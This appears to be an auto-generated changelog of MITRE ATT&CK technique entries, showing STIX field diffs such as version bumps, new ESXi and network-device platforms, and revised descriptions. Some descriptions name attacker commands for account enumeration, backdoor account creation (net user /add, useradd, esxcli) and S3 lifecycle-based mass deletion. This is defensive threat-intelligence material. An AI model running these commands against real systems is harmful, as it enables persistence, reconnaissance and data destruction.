[T1543.004] Create or Modify System Process: Launch Daemon
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_effective_permissions | ['root', 'Administrator'] | |
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:48.453000+00:00 | 2025-04-15 19:58:33.604000+00:00 |
external_references[5]['description'] | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017. | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved November 17, 2024. |
external_references[5]['url'] | https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf | https://papers.put.as/papers/macosx/2016/RSA_OSX_Malware.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
[T1569.001] System Services: Launchctl
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | False | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-20 20:14:35.179000+00:00 | 2025-04-15 19:58:46.562000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1485.001] Data Destruction: Lifecycle-Triggered Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-16 21:27:02.481000+00:00 | 2025-04-15 19:58:06.787000+00:00 |
description (old value):
Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within.
Cloud storage buckets often allow users to set lifecycle policies to automate the migration, archival, or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation: GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor has sufficient permissions to modify these policies, they may be able to delete all objects at once.
For example, in AWS environments, an adversary with the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle` API call to apply a lifecycle policy to an S3 bucket that deletes all objects in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657), adversaries may also perform this action on buckets storing cloud logs for [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation: Datadog S3 Lifecycle CloudTrail Logs)
description (new value):
Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within.
Cloud storage buckets often allow users to set lifecycle policies to automate the migration, archival, or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation: GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor has sufficient permissions to modify these policies, they may be able to delete all objects at once.
For example, in AWS environments, an adversary with the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle` API call to apply a lifecycle policy to an S3 bucket that deletes all objects in the bucket after one day.(Citation: Palo Alto Cloud Ransomware)(Citation: Halcyon AWS Ransomware 2025) In addition to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657), adversaries may also perform this action on buckets storing cloud logs for [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation: Datadog S3 Lifecycle CloudTrail Logs)
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Halcyon AWS Ransomware 2025', 'description': 'Halcyon RISE Team. (2025, January 13). Abusing AWS Native Services: Ransomware Encrypting S3 Buckets with SSE-C. Retrieved March 18, 2025.', 'url': 'https://www.halcyon.ai/blog/abusing-aws-native-services-ransomware-encrypting-s3-buckets-with-sse-c'} |
[T1055.015] Process Injection: ListPlanting
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-08-14 17:34:33.948000+00:00 | 2025-04-15 19:59:18.862000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1087.001] Account Discovery: Local Account
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-11 23:47:44.655000+00:00 | 2025-04-15 19:58:14.718000+00:00 |
description | Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Commands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groups on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts. | Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Commands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groups on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS, the dscl . list /Users command can be used to enumerate local accounts. On ESXi servers, the `esxcli system account list` command can list local user accounts.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021) |
external_references[4]['description'] | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020. | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 17, 2024. |
external_references[4]['url'] | https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql | https://www.elastic.co/security-labs/embracing-offensive-tooling-building-detections-against-koadic-using-eql |
x_mitre_version | 1.4 | 1.5 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Crowdstrike Hypervisor Jackpotting Pt 2 2021', 'description': 'Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.', 'url': 'https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/'} |
x_mitre_platforms | | ESXi |
[T1136.001] Create Account: Local Account
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-16 17:40:37.995000+00:00 | 2025-04-15 19:58:36.237000+00:00 |
description | Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
For example, with a sufficient level of access, the Windows net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as username , or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. | Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
For example, with a sufficient level of access, the Windows net user /add command can be used to create a local account. In Linux, the `useradd` command can be used, while on macOS systems, the dscl -create command can be used. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as username , to ESXi servers via `esxcli system account add`, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1078.003] Valid Accounts: Local Accounts
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:36:36.681000+00:00 | 2025-04-15 19:59:24.607000+00:00 |
x_mitre_version | 1.4 | 1.5 |
x_mitre_platforms[4] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1074.001] Data Staged: Local Data Staging
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-08-26 16:28:39.920000+00:00 | 2025-04-15 19:58:11.270000+00:00 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1114.001] Email Collection: Local Email Collection
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-24 17:59:20.983000+00:00 | 2025-04-15 19:58:12.090000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1654] Log Enumeration
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 12:24:40.892000+00:00 | 2025-04-15 19:58:48.705000+00:00 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1547.015] Boot or Logon Autostart Execution: Login Items
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-18 16:36:37.042000+00:00 | 2025-04-15 19:58:47.788000+00:00 |
external_references[8]['description'] | fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved October 4, 2021. | fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved November 17, 2024. |
external_references[8]['url'] | http://www.hexed.in/2019/07/osxdok-analysis.html | https://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html |
external_references[3]['description'] | Tim Schroeder. (2013, April 21). SMLoginItemSetEnabled Demystified. Retrieved October 5, 2021. | Tim Schroeder. (2013, April 21). SMLoginItemSetEnabled Demystified. Retrieved November 17, 2024. |
external_references[3]['url'] | https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/ | https://web.archive.org/web/20160216034946/https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/ |
x_mitre_version | 1.0 | 1.1 |
[T1059.011] Command and Scripting Interpreter: Lua
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | False | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-01 15:19:54.163000+00:00 | 2025-04-15 19:58:57.854000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[3] | Network | Network Devices |
[T1218.014] System Binary Proxy Execution: MMC
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Application control', 'Digital Certificate Validation'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-05-20 17:41:16.112000+00:00 | 2025-04-16 20:37:23.449000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 2.0 | 2.1 |
[T1127.001] Trusted Developer Utilities Proxy Execution: MSBuild
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['.NET Framework version 4 or higher'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-14 19:23:58.317000+00:00 | 2025-04-16 20:37:20.712000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
[T1071.003] Application Layer Protocol: Mail Protocols
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 12:28:59.928000+00:00 | 2025-04-15 19:58:32.320000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[3] | Network | Network Devices |
[T1134.003] Access Token Manipulation: Make and Impersonate Token
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Windows User Account Control', 'System access controls', 'File system access controls'] | |
x_mitre_effective_permissions | ['SYSTEM'] | |
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-10 17:55:46.905000+00:00 | 2025-04-15 19:58:49.948000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1204.002] User Execution: Malicious File
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | False | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-25 20:50:34.876000+00:00 | 2025-04-15 19:58:13.883000+00:00 |
x_mitre_version | 1.4 | 1.5 |
[T1204.003] User Execution: Malicious Image
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-26 16:42:35.318000+00:00 | 2025-04-15 19:58:58.109000+00:00 |
description | Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021) | Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Resource Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021) |
x_mitre_version | 1.1 | 1.2 |
[T1204.001] User Execution: Malicious Link
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | False | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-10 16:40:03.786000+00:00 | 2025-04-15 19:59:20.108000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1553.005] Subvert Trust Controls: Mark-of-the-Web Bypass
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Application Control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 14:19:50.768000+00:00 | 2025-04-15 19:58:45.702000+00:00 |
external_references[1]['description'] | Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved February 22, 2021. | Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved November 17, 2024. |
external_references[1]['url'] | https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316 | https://web.archive.org/web/20201203131725/https://christiaanbeek.medium.com/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1036.008] Masquerading: Masquerade File Type
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-06-14 23:03:51.540000+00:00 | 2025-04-15 19:58:12.855000+00:00 |
description | Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file, is 0xFF 0xD8 and the file extension is either `.JPE`, `.JPEG` or `.JPG`.
Adversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections.
Common non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of test.gif . A user may not know that a file is malicious due to the benign appearance and file extension.
Polygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID) | Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, icon, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file, is 0xFF 0xD8 and the file extension is either `.JPE`, `.JPEG` or `.JPG`.
Adversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections.
Common non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of test.gif . A user may not know that a file is malicious due to the benign appearance and file extension.
Polygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID) |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_contributors[1] | Ben Smith, @ezaspy | Ben Smith, @cyberg3cko |
[T1036] Masquerading
Current version: 1.8
Version changed from: 1.7 → 1.8
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Application Control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-16 20:10:38.450000+00:00 | 2025-04-15 19:58:26.186000+00:00 |
x_mitre_version | 1.7 | 1.8 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1556] Modify Authentication Process
Current version: 2.6
Version changed from: 2.5 → 2.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:59:21.746000+00:00 |
x_mitre_version | 2.5 | 2.6 |
x_mitre_platforms[3] | Network | Network Devices |
[T1601] Modify System Image
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-10-22 17:50:47.635000+00:00 | 2025-04-15 19:58:57.683000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[T1218.005] System Binary Proxy Execution: Mshta
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Application control', 'Digital Certificate Validation'] | |
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-11 20:38:28.802000+00:00 | 2025-04-15 19:58:47.701000+00:00 |
x_mitre_version | 2.0 | 2.1 |
[T1218.007] System Binary Proxy Execution: Msiexec
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Application control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-19 17:33:16.346000+00:00 | 2025-04-16 20:37:16.547000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 2.0 | 2.1 |
[T1556.006] Modify Authentication Process: Multi-Factor Authentication
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Multi-Factor Authentication'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:59.338000+00:00 |
x_mitre_version | 1.3 | 1.4 |
[T1104] Multi-Stage Channels
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-07-14 19:43:38.181000+00:00 | 2025-04-15 19:58:48.060000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1090.003] Proxy: Multi-hop Proxy
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-09-25 20:48:24.411000+00:00 | 2025-04-15 19:58:56.270000+00:00 |
description | Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations. (Citation: ORB Mandiant)
In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan) | Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations.(Citation: ORB Mandiant)
In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan) |
x_mitre_version | 2.2 | 2.3 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | Network Devices |
x_mitre_platforms | | ESXi |
iterable_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | Network | |
[T1003.003] OS Credential Dumping: NTDS
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_system_requirements | ['Access to Domain Controller or backup'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-07-28 14:41:38.908000+00:00 | 2025-04-15 19:59:19.862000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
[T1564.004] Hide Artifacts: NTFS File Attributes
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Anti-virus', 'Host forensic analysis', 'Signature-based detection'] | |
x_mitre_system_requirements | ['NTFS partitioned hard drive'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-09-12 15:27:29.615000+00:00 | 2025-04-15 19:59:20.821000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1106] Native API
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_remote_support | False | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-09-12 15:25:57.058000+00:00 | 2025-04-15 19:58:23.043000+00:00 |
x_mitre_version | 2.2 | 2.3 |
[T1546.007] Event Triggered Execution: Netsh Helper DLL
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-04-20 17:09:17.363000+00:00 | 2025-04-16 20:37:23.142000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[T1599.001] Network Boundary Bridging: Network Address Translation Traversal
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2020-10-21 01:45:58.951000+00:00 | 2025-04-15 19:58:30.055000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[T1599] Network Boundary Bridging
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Firewall', 'System Access Controls'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-05-05 05:05:44.200000+00:00 | 2025-04-16 20:37:19.349000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[0] | Network | Network Devices |
[T1556.004] Modify Authentication Process: Network Device Authentication
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-12-14 23:14:26.107000+00:00 | 2025-04-15 21:40:12.055000+00:00 |
external_references[1]['description'] | Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. | Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.mandiant.com/resources/synful-knock-acis | https://cloud.google.com/blog/topics/threat-intelligence/synful-knock-acis/ |
x_mitre_version | 2.0 | 2.1 |
x_mitre_platforms[0] | Network | Network Devices |
